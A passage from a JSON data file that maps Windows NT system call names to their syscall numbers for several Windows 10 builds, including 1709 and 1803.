179, "NtCreateProfileEx": 180, "NtCreateRegistryTransaction": 181, "NtCreateResourceManager": 182, "NtCreateSemaphore": 183, "NtCreateSymbolicLinkObject": 184, "NtCreateThreadEx": 185, "NtCreateTimer": 186, "NtCreateTimer2": 187, "NtCreateToken": 188, "NtCreateTokenEx": 189, "NtCreateTransaction": 190, "NtCreateTransactionManager": 191, "NtCreateUserProcess": 192, "NtCreateWaitCompletionPacket": 193, "NtCreateWaitablePort": 194, "NtCreateWnfStateName": 195, "NtCreateWorkerFactory": 196, "NtDebugActiveProcess": 197, "NtDebugContinue": 198, "NtDeleteAtom": 199, "NtDeleteBootEntry": 200, "NtDeleteDriverEntry": 201, "NtDeleteFile": 202, "NtDeleteKey": 203, "NtDeleteObjectAuditAlarm": 204, "NtDeletePrivateNamespace": 205, "NtDeleteValueKey": 206, "NtDeleteWnfStateData": 207, "NtDeleteWnfStateName": 208, "NtDisableLastKnownGood": 209, "NtDisplayString": 210, "NtDrawText": 211, "NtEnableLastKnownGood": 212, "NtEnumerateBootEntries": 213, "NtEnumerateDriverEntries": 214, "NtEnumerateSystemEnvironmentValuesEx": 215, "NtEnumerateTransactionObject": 216, "NtExtendSection": 217, "NtFilterBootOption": 218, "NtFilterToken": 219, "NtFilterTokenEx": 220, "NtFlushBuffersFileEx": 221, "NtFlushInstallUILanguage": 222, "NtFlushInstructionCache": 223, "NtFlushKey": 224, "NtFlushProcessWriteBuffers": 225, "NtFlushVirtualMemory": 226, "NtFlushWriteBuffer": 227, "NtFreeUserPhysicalPages": 228, "NtFreezeRegistry": 229, "NtFreezeTransactions": 230, "NtGetCachedSigningLevel": 231, "NtGetCompleteWnfStateSubscription": 232, "NtGetContextThread": 233, "NtGetCurrentProcessorNumber": 234, "NtGetCurrentProcessorNumberEx": 235, "NtGetDevicePowerState": 236, "NtGetMUIRegistryInfo": 237, "NtGetNextProcess": 238, "NtGetNextThread": 239, "NtGetNlsSectionPtr": 240, "NtGetNotificationResourceManager": 241, "NtGetWriteWatch": 242, "NtImpersonateAnonymousToken": 243, "NtImpersonateThread": 244, "NtInitializeEnclave": 245, "NtInitializeNlsFiles": 246, "NtInitializeRegistry": 247, "NtInitiatePowerAction": 248, "NtIsSystemResumeAutomatic": 249, "NtIsUILanguageComitted": 250, "NtListenPort": 251, "NtLoadDriver": 252, "NtLoadEnclaveData": 253, "NtLoadHotPatch": 254, "NtLoadKey": 255, "NtLoadKey2": 256, "NtLoadKeyEx": 257, "NtLockFile": 258, "NtLockProductActivationKeys": 259, "NtLockRegistryKey": 260, "NtLockVirtualMemory": 261, "NtMakePermanentObject": 262, "NtMakeTemporaryObject": 263, "NtManagePartition": 264, "NtMapCMFModule": 265, "NtMapUserPhysicalPages": 266, "NtModifyBootEntry": 267, "NtModifyDriverEntry": 268, "NtNotifyChangeDirectoryFile": 269, "NtNotifyChangeKey": 270, "NtNotifyChangeMultipleKeys": 271, "NtNotifyChangeSession": 272, "NtOpenEnlistment": 273, "NtOpenEventPair": 274, "NtOpenIoCompletion": 275, "NtOpenJobObject": 276, "NtOpenKeyEx": 277, "NtOpenKeyTransacted": 278, "NtOpenKeyTransactedEx": 279, "NtOpenKeyedEvent": 280, "NtOpenMutant": 281, "NtOpenObjectAuditAlarm": 282, "NtOpenPartition": 283, "NtOpenPrivateNamespace": 284, "NtOpenProcessToken": 285, "NtOpenRegistryTransaction": 286, "NtOpenResourceManager": 287, "NtOpenSemaphore": 288, "NtOpenSession": 289, "NtOpenSymbolicLinkObject": 290, "NtOpenThread": 291, "NtOpenTimer": 292, "NtOpenTransaction": 293, "NtOpenTransactionManager": 294, "NtPlugPlayControl": 295, "NtPrePrepareComplete": 296, "NtPrePrepareEnlistment": 297, "NtPrepareComplete": 298, "NtPrepareEnlistment": 299, "NtPrivilegeCheck": 300, "NtPrivilegeObjectAuditAlarm": 301, "NtPrivilegedServiceAuditAlarm": 302, "NtPropagationComplete": 303, "NtPropagationFailed": 304, "NtPulseEvent": 305, "NtQueryAuxiliaryCounterFrequency": 306, "NtQueryBootEntryOrder": 307, "NtQueryBootOptions": 308, "NtQueryDebugFilterState": 309, "NtQueryDirectoryObject": 310, "NtQueryDriverEntryOrder": 311, "NtQueryEaFile": 312, "NtQueryFullAttributesFile": 313, "NtQueryInformationAtom": 314, "NtQueryInformationByName": 315, "NtQueryInformationEnlistment": 316, "NtQueryInformationJobObject": 317, "NtQueryInformationPort": 318, "NtQueryInformationResourceManager": 319, "NtQueryInformationTransaction": 320, "NtQueryInformationTransactionManager": 321, "NtQueryInformationWorkerFactory": 322, "NtQueryInstallUILanguage": 323, "NtQueryIntervalProfile": 324, "NtQueryIoCompletion": 325, "NtQueryLicenseValue": 326, "NtQueryMultipleValueKey": 327, "NtQueryMutant": 328, "NtQueryOpenSubKeys": 329, "NtQueryOpenSubKeysEx": 330, "NtQueryPortInformationProcess": 331, "NtQueryQuotaInformationFile": 332, "NtQuerySecurityAttributesToken": 333, "NtQuerySecurityObject": 334, "NtQuerySecurityPolicy": 335, "NtQuerySemaphore": 336, "NtQuerySymbolicLinkObject": 337, "NtQuerySystemEnvironmentValue": 338, "NtQuerySystemEnvironmentValueEx": 339, "NtQuerySystemInformationEx": 340, "NtQueryTimerResolution": 341, "NtQueryWnfStateData": 342, "NtQueryWnfStateNameInformation": 343, "NtQueueApcThreadEx": 344, "NtRaiseException": 345, "NtRaiseHardError": 346, "NtReadOnlyEnlistment": 347, "NtRecoverEnlistment": 348, "NtRecoverResourceManager": 349, "NtRecoverTransactionManager": 350, "NtRegisterProtocolAddressInformation": 351, "NtRegisterThreadTerminatePort": 352, "NtReleaseKeyedEvent": 353, "NtReleaseWorkerFactoryWorker": 354, "NtRemoveIoCompletionEx": 355, "NtRemoveProcessDebug": 356, "NtRenameKey": 357, "NtRenameTransactionManager": 358, "NtReplaceKey": 359, "NtReplacePartitionUnit": 360, "NtReplyWaitReplyPort": 361, "NtRequestPort": 362, "NtResetEvent": 363, "NtResetWriteWatch": 364, "NtRestoreKey": 365, "NtResumeProcess": 366, "NtRevertContainerImpersonation": 367, "NtRollbackComplete": 368, "NtRollbackEnlistment": 369, "NtRollbackRegistryTransaction": 370, "NtRollbackTransaction": 371, "NtRollforwardTransactionManager": 372, "NtSaveKey": 373, "NtSaveKeyEx": 374, "NtSaveMergedKeys": 375, "NtSecureConnectPort": 376, "NtSerializeBoot": 377, "NtSetBootEntryOrder": 378, "NtSetBootOptions": 379, "NtSetCachedSigningLevel": 380, "NtSetCachedSigningLevel2": 381, "NtSetContextThread": 382, "NtSetDebugFilterState": 383, "NtSetDefaultHardErrorPort": 384, "NtSetDefaultLocale": 385, "NtSetDefaultUILanguage": 386, "NtSetDriverEntryOrder": 387, "NtSetEaFile": 388, "NtSetHighEventPair": 389, "NtSetHighWaitLowEventPair": 390, "NtSetIRTimer": 391, "NtSetInformationDebugObject": 392, "NtSetInformationEnlistment": 393, "NtSetInformationJobObject": 394, "NtSetInformationKey": 395, "NtSetInformationResourceManager": 396, "NtSetInformationSymbolicLink": 397, "NtSetInformationToken": 398, "NtSetInformationTransaction": 399, "NtSetInformationTransactionManager": 400, "NtSetInformationVirtualMemory": 401, "NtSetInformationWorkerFactory": 402, "NtSetIntervalProfile": 403, "NtSetIoCompletion": 404, "NtSetIoCompletionEx": 405, "NtSetLdtEntries": 406, "NtSetLowEventPair": 407, "NtSetLowWaitHighEventPair": 408, "NtSetQuotaInformationFile": 409, "NtSetSecurityObject": 410, "NtSetSystemEnvironmentValue": 411, "NtSetSystemEnvironmentValueEx": 412, "NtSetSystemInformation": 413, "NtSetSystemPowerState": 414, "NtSetSystemTime": 415, "NtSetThreadExecutionState": 416, "NtSetTimer2": 417, "NtSetTimerEx": 418, "NtSetTimerResolution": 419, "NtSetUuidSeed": 420, "NtSetVolumeInformationFile": 421, "NtSetWnfProcessNotificationEvent": 422, "NtShutdownSystem": 423, "NtShutdownWorkerFactory": 424, "NtSignalAndWaitForSingleObject": 425, "NtSinglePhaseReject": 426, "NtStartProfile": 427, "NtStopProfile": 428, "NtSubscribeWnfStateChange": 429, "NtSuspendProcess": 430, "NtSuspendThread": 431, "NtSystemDebugControl": 432, "NtTerminateJobObject": 433, "NtTestAlert": 434, "NtThawRegistry": 435, "NtThawTransactions": 436, "NtTraceControl": 437, "NtTranslateFilePath": 438, "NtUmsThreadYield": 439, "NtUnloadDriver": 440, "NtUnloadKey": 441, "NtUnloadKey2": 442, "NtUnloadKeyEx": 443, "NtUnlockFile": 444, "NtUnlockVirtualMemory": 445, "NtUnmapViewOfSectionEx": 446, "NtUnsubscribeWnfStateChange": 447, "NtUpdateWnfStateData": 448, "NtVdmControl": 449, "NtWaitForAlertByThreadId": 450, "NtWaitForDebugEvent": 451, "NtWaitForKeyedEvent": 452, "NtWaitForWorkViaWorkerFactory": 453, "NtWaitHighEventPair": 454, "NtWaitLowEventPair": 455}, "1709": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireProcessActivityReference": 103, "NtAddAtomEx": 104, "NtAddBootEntry": 105, "NtAddDriverEntry": 106, "NtAdjustGroupsToken": 107, "NtAdjustTokenClaimsAndDeviceGroups": 108, "NtAlertResumeThread": 109, "NtAlertThread": 110, "NtAlertThreadByThreadId": 111, "NtAllocateLocallyUniqueId": 112, "NtAllocateReserveObject": 113, "NtAllocateUserPhysicalPages": 114, "NtAllocateUuids": 115, "NtAlpcAcceptConnectPort": 116, "NtAlpcCancelMessage": 117, "NtAlpcConnectPort": 118, "NtAlpcConnectPortEx": 119, "NtAlpcCreatePort": 120, "NtAlpcCreatePortSection": 121, "NtAlpcCreateResourceReserve": 122, "NtAlpcCreateSectionView": 123, "NtAlpcCreateSecurityContext": 124, "NtAlpcDeletePortSection": 125, "NtAlpcDeleteResourceReserve": 126, "NtAlpcDeleteSectionView": 127, "NtAlpcDeleteSecurityContext": 128, "NtAlpcDisconnectPort": 129, "NtAlpcImpersonateClientContainerOfPort": 130, "NtAlpcImpersonateClientOfPort": 131, "NtAlpcOpenSenderProcess": 132, "NtAlpcOpenSenderThread": 133, "NtAlpcQueryInformation": 134, "NtAlpcQueryInformationMessage": 135, "NtAlpcRevokeSecurityContext": 136, "NtAlpcSendWaitReceivePort": 137, "NtAlpcSetInformation": 138, "NtAreMappedFilesTheSame": 139, "NtAssignProcessToJobObject": 140, "NtAssociateWaitCompletionPacket": 141, "NtCallEnclave": 142, "NtCancelIoFileEx": 143, "NtCancelSynchronousIoFile": 144, "NtCancelTimer2": 145, "NtCancelWaitCompletionPacket": 146, "NtCommitComplete": 147, "NtCommitEnlistment": 148, "NtCommitRegistryTransaction": 149, "NtCommitTransaction": 150, "NtCompactKeys": 151, "NtCompareObjects": 152, "NtCompareSigningLevels": 153, "NtCompareTokens": 154, "NtCompleteConnectPort": 155, "NtCompressKey": 156, "NtConnectPort": 157, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 158, "NtCreateDebugObject": 159, "NtCreateDirectoryObject": 160, "NtCreateDirectoryObjectEx": 161, "NtCreateEnclave": 162, "NtCreateEnlistment": 163, "NtCreateEventPair": 164, "NtCreateIRTimer": 165, "NtCreateIoCompletion": 166, "NtCreateJobObject": 167, "NtCreateJobSet": 168, "NtCreateKeyTransacted": 169, "NtCreateKeyedEvent": 170, "NtCreateLowBoxToken": 171, "NtCreateMailslotFile": 172, "NtCreateMutant": 173, "NtCreateNamedPipeFile": 174, "NtCreatePagingFile": 175, "NtCreatePartition": 176, "NtCreatePort": 177, "NtCreatePrivateNamespace": 178, "NtCreateProcess": 179, "NtCreateProfile": 180, "NtCreateProfileEx": 181, "NtCreateRegistryTransaction": 182, "NtCreateResourceManager": 183, "NtCreateSemaphore": 184, "NtCreateSymbolicLinkObject": 185, "NtCreateThreadEx": 186, "NtCreateTimer": 187, "NtCreateTimer2": 188, "NtCreateToken": 189, "NtCreateTokenEx": 190, "NtCreateTransaction": 191, "NtCreateTransactionManager": 192, "NtCreateUserProcess": 193, "NtCreateWaitCompletionPacket": 194, "NtCreateWaitablePort": 195, "NtCreateWnfStateName": 196, "NtCreateWorkerFactory": 197, "NtDebugActiveProcess": 198, "NtDebugContinue": 199, "NtDeleteAtom": 200, "NtDeleteBootEntry": 201, "NtDeleteDriverEntry": 202, "NtDeleteFile": 203, "NtDeleteKey": 204, "NtDeleteObjectAuditAlarm": 205, "NtDeletePrivateNamespace": 206, "NtDeleteValueKey": 207, "NtDeleteWnfStateData": 208, "NtDeleteWnfStateName": 209, "NtDisableLastKnownGood": 210, "NtDisplayString": 211, "NtDrawText": 212, "NtEnableLastKnownGood": 213, "NtEnumerateBootEntries": 214, "NtEnumerateDriverEntries": 215, "NtEnumerateSystemEnvironmentValuesEx": 216, "NtEnumerateTransactionObject": 217, "NtExtendSection": 218, "NtFilterBootOption": 219, "NtFilterToken": 220, "NtFilterTokenEx": 221, "NtFlushBuffersFileEx": 222, "NtFlushInstallUILanguage": 223, "NtFlushInstructionCache": 224, "NtFlushKey": 225, "NtFlushProcessWriteBuffers": 226, "NtFlushVirtualMemory": 227, "NtFlushWriteBuffer": 228, "NtFreeUserPhysicalPages": 229, "NtFreezeRegistry": 230, "NtFreezeTransactions": 231, "NtGetCachedSigningLevel": 232, "NtGetCompleteWnfStateSubscription": 233, "NtGetContextThread": 234, "NtGetCurrentProcessorNumber": 235, "NtGetCurrentProcessorNumberEx": 236, "NtGetDevicePowerState": 237, "NtGetMUIRegistryInfo": 238, "NtGetNextProcess": 239, "NtGetNextThread": 240, "NtGetNlsSectionPtr": 241, "NtGetNotificationResourceManager": 242, "NtGetWriteWatch": 243, "NtImpersonateAnonymousToken": 244, "NtImpersonateThread": 245, "NtInitializeEnclave": 246, "NtInitializeNlsFiles": 247, "NtInitializeRegistry": 248, "NtInitiatePowerAction": 249, "NtIsSystemResumeAutomatic": 250, "NtIsUILanguageComitted": 251, "NtListenPort": 252, "NtLoadDriver": 253, "NtLoadEnclaveData": 254, "NtLoadHotPatch": 255, "NtLoadKey": 256, "NtLoadKey2": 257, "NtLoadKeyEx": 258, "NtLockFile": 259, "NtLockProductActivationKeys": 260, "NtLockRegistryKey": 261, "NtLockVirtualMemory": 262, "NtMakePermanentObject": 263, "NtMakeTemporaryObject": 264, "NtManagePartition": 265, "NtMapCMFModule": 266, "NtMapUserPhysicalPages": 267, "NtModifyBootEntry": 268, "NtModifyDriverEntry": 269, "NtNotifyChangeDirectoryFile": 270, "NtNotifyChangeDirectoryFileEx": 271, "NtNotifyChangeKey": 272, "NtNotifyChangeMultipleKeys": 273, "NtNotifyChangeSession": 274, "NtOpenEnlistment": 275, "NtOpenEventPair": 276, "NtOpenIoCompletion": 277, "NtOpenJobObject": 278, "NtOpenKeyEx": 279, "NtOpenKeyTransacted": 280, "NtOpenKeyTransactedEx": 281, "NtOpenKeyedEvent": 282, "NtOpenMutant": 283, "NtOpenObjectAuditAlarm": 284, "NtOpenPartition": 285, "NtOpenPrivateNamespace": 286, "NtOpenProcessToken": 287, "NtOpenRegistryTransaction": 288, "NtOpenResourceManager": 289, "NtOpenSemaphore": 290, "NtOpenSession": 291, "NtOpenSymbolicLinkObject": 292, "NtOpenThread": 293, "NtOpenTimer": 294, "NtOpenTransaction": 295, "NtOpenTransactionManager": 296, "NtPlugPlayControl": 297, "NtPrePrepareComplete": 298, "NtPrePrepareEnlistment": 299, "NtPrepareComplete": 300, "NtPrepareEnlistment": 301, "NtPrivilegeCheck": 302, "NtPrivilegeObjectAuditAlarm": 303, "NtPrivilegedServiceAuditAlarm": 304, "NtPropagationComplete": 305, "NtPropagationFailed": 306, "NtPulseEvent": 307, "NtQueryAuxiliaryCounterFrequency": 308, "NtQueryBootEntryOrder": 309, "NtQueryBootOptions": 310, "NtQueryDebugFilterState": 311, "NtQueryDirectoryFileEx": 312, "NtQueryDirectoryObject": 313, "NtQueryDriverEntryOrder": 314, "NtQueryEaFile": 315, "NtQueryFullAttributesFile": 316, "NtQueryInformationAtom": 317, "NtQueryInformationByName": 318, "NtQueryInformationEnlistment": 319, "NtQueryInformationJobObject": 320, "NtQueryInformationPort": 321, "NtQueryInformationResourceManager": 322, "NtQueryInformationTransaction": 323, "NtQueryInformationTransactionManager": 324, "NtQueryInformationWorkerFactory": 325, "NtQueryInstallUILanguage": 326, "NtQueryIntervalProfile": 327, "NtQueryIoCompletion": 328, "NtQueryLicenseValue": 329, "NtQueryMultipleValueKey": 330, "NtQueryMutant": 331, "NtQueryOpenSubKeys": 332, "NtQueryOpenSubKeysEx": 333, "NtQueryPortInformationProcess": 334, "NtQueryQuotaInformationFile": 335, "NtQuerySecurityAttributesToken": 336, "NtQuerySecurityObject": 337, "NtQuerySecurityPolicy": 338, "NtQuerySemaphore": 339, "NtQuerySymbolicLinkObject": 340, "NtQuerySystemEnvironmentValue": 341, "NtQuerySystemEnvironmentValueEx": 342, "NtQuerySystemInformationEx": 343, "NtQueryTimerResolution": 344, "NtQueryWnfStateData": 345, "NtQueryWnfStateNameInformation": 346, "NtQueueApcThreadEx": 347, "NtRaiseException": 348, "NtRaiseHardError": 349, "NtReadOnlyEnlistment": 350, "NtRecoverEnlistment": 351, "NtRecoverResourceManager": 352, "NtRecoverTransactionManager": 353, "NtRegisterProtocolAddressInformation": 354, "NtRegisterThreadTerminatePort": 355, "NtReleaseKeyedEvent": 356, "NtReleaseWorkerFactoryWorker": 357, "NtRemoveIoCompletionEx": 358, "NtRemoveProcessDebug": 359, "NtRenameKey": 360, "NtRenameTransactionManager": 361, "NtReplaceKey": 362, "NtReplacePartitionUnit": 363, "NtReplyWaitReplyPort": 364, "NtRequestPort": 365, "NtResetEvent": 366, "NtResetWriteWatch": 367, "NtRestoreKey": 368, "NtResumeProcess": 369, "NtRevertContainerImpersonation": 370, "NtRollbackComplete": 371, "NtRollbackEnlistment": 372, "NtRollbackRegistryTransaction": 373, "NtRollbackTransaction": 374, "NtRollforwardTransactionManager": 375, "NtSaveKey": 376, "NtSaveKeyEx": 377, "NtSaveMergedKeys": 378, "NtSecureConnectPort": 379, "NtSerializeBoot": 380, "NtSetBootEntryOrder": 381, "NtSetBootOptions": 382, "NtSetCachedSigningLevel": 383, "NtSetCachedSigningLevel2": 384, "NtSetContextThread": 385, "NtSetDebugFilterState": 386, "NtSetDefaultHardErrorPort": 387, "NtSetDefaultLocale": 388, "NtSetDefaultUILanguage": 389, "NtSetDriverEntryOrder": 390, "NtSetEaFile": 391, "NtSetHighEventPair": 392, "NtSetHighWaitLowEventPair": 393, "NtSetIRTimer": 394, "NtSetInformationDebugObject": 395, "NtSetInformationEnlistment": 396, "NtSetInformationJobObject": 397, "NtSetInformationKey": 398, "NtSetInformationResourceManager": 399, "NtSetInformationSymbolicLink": 400, "NtSetInformationToken": 401, "NtSetInformationTransaction": 402, "NtSetInformationTransactionManager": 403, "NtSetInformationVirtualMemory": 404, "NtSetInformationWorkerFactory": 405, "NtSetIntervalProfile": 406, "NtSetIoCompletion": 407, "NtSetIoCompletionEx": 408, "NtSetLdtEntries": 409, "NtSetLowEventPair": 410, "NtSetLowWaitHighEventPair": 411, "NtSetQuotaInformationFile": 412, "NtSetSecurityObject": 413, "NtSetSystemEnvironmentValue": 414, "NtSetSystemEnvironmentValueEx": 415, "NtSetSystemInformation": 416, "NtSetSystemPowerState": 417, "NtSetSystemTime": 418, "NtSetThreadExecutionState": 419, "NtSetTimer2": 420, "NtSetTimerEx": 421, "NtSetTimerResolution": 422, "NtSetUuidSeed": 423, "NtSetVolumeInformationFile": 424, "NtSetWnfProcessNotificationEvent": 425, "NtShutdownSystem": 426, "NtShutdownWorkerFactory": 427, "NtSignalAndWaitForSingleObject": 428, "NtSinglePhaseReject": 429, "NtStartProfile": 430, "NtStopProfile": 431, "NtSubscribeWnfStateChange": 432, "NtSuspendProcess": 433, "NtSuspendThread": 434, "NtSystemDebugControl": 435, "NtTerminateEnclave": 436, "NtTerminateJobObject": 437, "NtTestAlert": 438, "NtThawRegistry": 439, "NtThawTransactions": 440, "NtTraceControl": 441, "NtTranslateFilePath": 442, "NtUmsThreadYield": 443, "NtUnloadDriver": 444, "NtUnloadKey": 445, "NtUnloadKey2": 446, "NtUnloadKeyEx": 447, "NtUnlockFile": 448, "NtUnlockVirtualMemory": 449, "NtUnmapViewOfSectionEx": 450, "NtUnsubscribeWnfStateChange": 451, "NtUpdateWnfStateData": 452, "NtVdmControl": 453, "NtWaitForAlertByThreadId": 454, "NtWaitForDebugEvent": 455, "NtWaitForKeyedEvent": 456, "NtWaitForWorkViaWorkerFactory": 457, "NtWaitHighEventPair": 458, "NtWaitLowEventPair": 459}, "1803": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireProcessActivityReference": 103, "NtAddAtomEx": 104, "NtAddBootEntry": 105, "NtAddDriverEntry": 106, "NtAdjustGroupsToken": 107, "NtAdjustTokenClaimsAndDeviceGroups": 108, "NtAlertResumeThread": 109, "NtAlertThread": 110, "NtAlertThreadByThreadId": 111, "NtAllocateLocallyUniqueId": 112, "NtAllocateReserveObject": 113, "NtAllocateUserPhysicalPages": 114, "NtAllocateUuids": 115, "NtAllocateVirtualMemoryEx": 116, "NtAlpcAcceptConnectPort": 117, "NtAlpcCancelMessage": 118, "NtAlpcConnectPort": 119, "NtAlpcConnectPortEx": 120, "NtAlpcCreatePort": 121, "NtAlpcCreatePortSection": 122, "NtAlpcCreateResourceReserve": 123, "NtAlpcCreateSectionView": 124, "NtAlpcCreateSecurityContext": 125, "NtAlpcDeletePortSection": 126, "NtAlpcDeleteResourceReserve": 127, "NtAlpcDeleteSectionView": 128, "NtAlpcDeleteSecurityContext": 129, "NtAlpcDisconnectPort": 130, "NtAlpcImpersonateClientContainerOfPort": 131, "NtAlpcImpersonateClientOfPort": 132, "NtAlpcOpenSenderProcess": 133, "NtAlpcOpenSenderThread": 134, "NtAlpcQueryInformation": 135, "NtAlpcQueryInformationMessage": 136, "NtAlpcRevokeSecurityContext": 137, "NtAlpcSendWaitReceivePort": 138, "NtAlpcSetInformation": 139, "NtAreMappedFilesTheSame": 140, "NtAssignProcessToJobObject": 141, "NtAssociateWaitCompletionPacket": 142, "NtCallEnclave": 143, "NtCancelIoFileEx": 144, "NtCancelSynchronousIoFile": 145, "NtCancelTimer2": 146, "NtCancelWaitCompletionPacket": 147, "NtCommitComplete": 148, "NtCommitEnlistment": 149, "NtCommitRegistryTransaction": 150, "NtCommitTransaction": 151, "NtCompactKeys": 152, "NtCompareObjects": 153, "NtCompareSigningLevels": 154, "NtCompareTokens": 155, "NtCompleteConnectPort": 156, "NtCompressKey": 157, "NtConnectPort": 158, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 159, "NtCreateDebugObject": 160, "NtCreateDirectoryObject": 161, "NtCreateDirectoryObjectEx": 162, "NtCreateEnclave": 163, "NtCreateEnlistment": 164, "NtCreateEventPair": 165, "NtCreateIRTimer": 166, "NtCreateIoCompletion": 167, "NtCreateJobObject": 168, "NtCreateJobSet": 169, "NtCreateKeyTransacted": 170, "NtCreateKeyedEvent": 171, "NtCreateLowBoxToken": 172, "NtCreateMailslotFile": 173, "NtCreateMutant": 174, "NtCreateNamedPipeFile": 175, "NtCreatePagingFile": 176, "NtCreatePartition": 177, "NtCreatePort": 178, "NtCreatePrivateNamespace": 179, "NtCreateProcess": 180, "NtCreateProfile": 181, "NtCreateProfileEx": 182, "NtCreateRegistryTransaction": 183, "NtCreateResourceManager": 184, "NtCreateSemaphore": 185, "NtCreateSymbolicLinkObject": 186, "NtCreateThreadEx": 187, "NtCreateTimer": 188, 